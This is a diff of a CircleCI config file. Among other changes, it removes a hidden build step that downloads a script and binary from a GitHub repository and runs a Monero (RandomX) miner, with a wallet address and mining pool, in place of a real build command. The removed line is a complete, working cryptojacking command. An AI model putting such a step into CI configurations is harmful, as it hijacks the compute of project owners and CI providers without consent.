--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -4,9 +4,8 @@ jobs:
     docker:
       - image: circleci/ruby:2.4.2-jessie-node
         auth:
-          username: mozard-user
+          username: mydockerhub-user
           password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
-          steps:
+    steps:
       - checkout
-      - run:  wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet 85WWETuEkPST5gHsH3Qdow4Xk2FVh9Mqi8kc51pyWQvKAkbK59rqFTofVXXqT3t5g8Dg2Sn9boz3g6hFfBdGbrnV4zrayWt  -mozard  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
-      
+      - run: lscpu
